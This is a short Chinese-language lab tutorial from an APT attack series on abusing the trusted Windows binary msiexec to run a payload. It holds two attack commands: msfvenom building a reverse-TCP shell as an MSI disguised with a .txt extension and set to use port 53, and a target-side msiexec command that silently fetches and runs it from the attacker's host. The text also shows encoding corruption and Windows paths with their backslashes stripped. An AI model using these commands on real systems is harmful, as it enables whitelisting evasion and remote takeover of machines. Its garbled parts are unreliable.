第七十八課:基于白名單Msiexec執(zhí)行payload第八季
專注APT攻擊與防御
https://micropoor.blogspot.com/
注:請多喝點(diǎn)熱水或者涼白開,身體特別重要。
Msiexec簡介:
Msiexec是Windows Installer的一部分。用于安裝Windows Installer安裝包(MSI),一般在運(yùn)行Microsoft Update安裝更新或安裝部分軟件的時(shí)候出現(xiàn),占用內(nèi)存比較大。并且集成于Windows 2003,Windows 7等。
說明:Msiexec.exe所在路徑已被系統(tǒng)添加PATH環(huán)境變量中,因此,Msiexec命令可識別。
基于白名單Msiexec.exe配置payload:
Windows 2003 默認(rèn)位置:
C:WINDOWSsystem32msiexec.exe
C:WINDOWSSysWOW64msiexec.exe
攻擊機(jī):192.168.1.4 Debian
靶機(jī): 192.168.1.119 Windows 2003
配置攻擊機(jī)msf:
配置payload:
1 msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐f msi > Micropoor_rev_x64_53.txt
靶機(jī)執(zhí)行:
1 C:WindowsSystem32msiexec.exe /q /i http://192.168.1.4/Micropoor_rev_x64_53.txt
Micropoor
?
